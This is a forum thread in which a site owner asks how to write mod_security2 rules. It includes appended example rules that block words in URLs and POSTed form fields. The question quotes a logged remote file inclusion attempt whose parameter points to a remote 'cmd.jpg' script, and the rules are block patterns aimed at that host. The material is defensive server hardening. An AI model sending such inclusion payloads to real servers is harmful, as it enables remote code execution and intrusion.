HOW: Create my own mod_security2 rules?

SuperBaby

I checked my mod_security2 log file and see a lot of entries similar to this:

GET /myfolder1/main.php?id=http://submitstation.de/xxxxxx/cmd.jpg

How do I set up a mod_security2 rule so that the hacker is stopped when:

1) He points his browser to my URL and the URL contains a specific word. In the above case, I would ban "submitstation.de".

2) He submits a form from my site and the content contains a specific word.
 

cPDan

SecRule "REQUEST_URI|QUERY_STRING" "aaa|bbb"

I added the rule above to mod_security2. It successfully forbids access if the URL contains aaa or bbb. But it does not prevent aaa and bbb from a submission form.
A form, at least via POST, is not part of the URI or QUERY_STRING. Your best bet is to ask the mod_security folks how to filter POST requests.
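One way to cover both cases asked about in this thread, as an added example that is not part of the original posts and not cPanel's or the ModSecurity project's own configuration. It assumes ModSecurity 2.x (2.7 or later, where every rule needs an `id`); the rule ids 100001 and 100002 and the `msg` texts are arbitrary placeholders.

```apache
# Added example (not from the thread). Rule ids are placeholders; use ids
# from your own local range.

SecRuleEngine On

# Without this directive ModSecurity does not read the request body, so
# ARGS_POST is empty and no rule can see submitted form fields.
SecRequestBodyAccess On

# Rule quoted in the thread: it looks only at the request line, which is why
# words sent in a POSTed form pass through.
# SecRule "REQUEST_URI|QUERY_STRING" "aaa|bbb"

# 1) Word in the URL or in any parameter, GET or POST.
#    ARGS is ARGS_GET plus ARGS_POST. phase:2 runs after the body is parsed.
#    @pm is a case-insensitive phrase match, so the dot in the hostname is
#    matched literally rather than as a regex wildcard.
SecRule REQUEST_URI|ARGS "@pm submitstation.de" \
    "id:100001,\
    phase:2,\
    t:none,t:urlDecodeUni,\
    deny,status:403,log,\
    msg:'Blocked word in URL or request parameter'"

# 2) Words in submitted form content only (urlencoded or multipart fields).
#    t:lowercase makes the regex match AAA, Aaa, and so on.
SecRule ARGS_POST "@rx aaa|bbb" \
    "id:100002,\
    phase:2,\
    t:none,t:lowercase,\
    deny,status:403,log,\
    msg:'Blocked word in POST form field'"
```

Replacing `deny,status:403` with `pass` while keeping `log` lets the rules run in log-only mode first, so false positives on legitimate form submissions show up in the audit log before anything is blocked.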